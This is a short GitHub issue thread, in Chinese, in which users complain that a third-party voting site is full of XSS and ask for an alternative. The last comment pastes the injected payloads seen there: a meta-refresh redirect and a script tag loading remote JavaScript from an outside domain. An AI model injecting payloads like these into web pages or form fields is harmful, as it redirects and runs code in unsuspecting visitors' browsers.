955.WLB icon indicating copy to clipboard operation
955.WLB copied to clipboard

可以用其他投票网站吗?XSS整的心态炸了啊

Open JackyTianer opened this issue 5 years ago • 3 comments

JackyTianer avatar Apr 17 '19 02:04 JackyTianer

有推荐的吗~

formulahendry avatar Apr 17 '19 05:04 formulahendry

https://cloudqa.iego.cn/sr/icu996

zlx362211854 avatar Apr 23 '19 08:04 zlx362211854

是的,那个网站各种xss,简直爆炸。 都是简单的这种xss

<p>If it were too difficult to allow as the folder under root,
<meta http-equiv="refresh" content="0;url=https://blogs.kainy.cn/?from=feathubXSS-meta">

<script language="javascript" type="text/javascript" async="" src="https://kainy.cn/js/XSS.js"> 
window.location.href=&#39;<a href="https://blogs.kainy.cn/?from=feathubXSS2">https://blogs.kainy.cn/?from=feathubXSS2</a>&#39;;
</script>
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。</p>

kk580kk avatar Apr 26 '19 02:04 kk580kk